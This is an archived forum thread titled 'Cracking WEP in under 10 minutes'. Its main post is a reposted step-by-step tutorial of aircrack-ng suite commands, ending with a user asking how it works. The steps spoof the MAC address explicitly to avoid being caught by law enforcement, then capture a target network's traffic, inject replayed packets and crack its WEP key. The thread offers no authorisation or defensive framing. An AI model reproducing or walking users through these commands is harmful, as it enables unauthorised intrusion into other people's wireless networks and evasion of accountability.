PDA

View Full Version : Cracking WEP in under 10 minutes


GhostExodus
May 3rd, 2009, 06:57 AM
Error 404

45:72:72:6f:72:20:34:30:34:1f:1f:4e:2f:41

Truant
June 23rd, 2009, 11:02 PM
How to crack WEP in under 10 minutes
By: Ghost Exodus

(also run this command wesside-ng -i wlan0) *note* usually doesnt work!

This tutorial works 100%, and to make this easier for you to understand, since i know most of you probablly dont what to understand what you are doing because your nubes, i broke this tutorial down all the way.

What you will need is back track 3 live iso. (cd or usb version)

1- Open up a shell
2- type: ifconfig (to see what wireless cards you have available i use wlan0)
3- type: airmon-ng stop wlan0 (disables wifi card)
4- type: ifconfig wlan0 down
5- type: macchanger -mac (type in a fake mac here like 00:55:44:33:22:11 wlan0

6- type; airmon-ng start wlan0 (start wireless card into monitoring mode with new faked mac address. dont want you nubes getting Fed'z'd.

7- type: airodump-ng wlan0 (see available wifi networks. only target WEP ones in this tutorial.
8- type: airodump-ng -c (channel wep access point is using) -w hackedwep --bssid (targetmacaddress) wlan0 (you can rename the hackedwep to anything you like. the file is stored in your home directory. it will be named as so: hackedwep-01.cap

9- type: aireplay-ng -1 0 -a (targetmacaddress) -h 00:55:44:33:22:11 -e (name of access point) wlan0

10: type: aireplay-ng -3 -b (targetmacaddress) -h 00:55:44:33:22:11 wlan0

11: type: aircrack-ng -n 64 -b (targetmacaddress) hackedwep-01.cap

Would you mind teaching us how it works?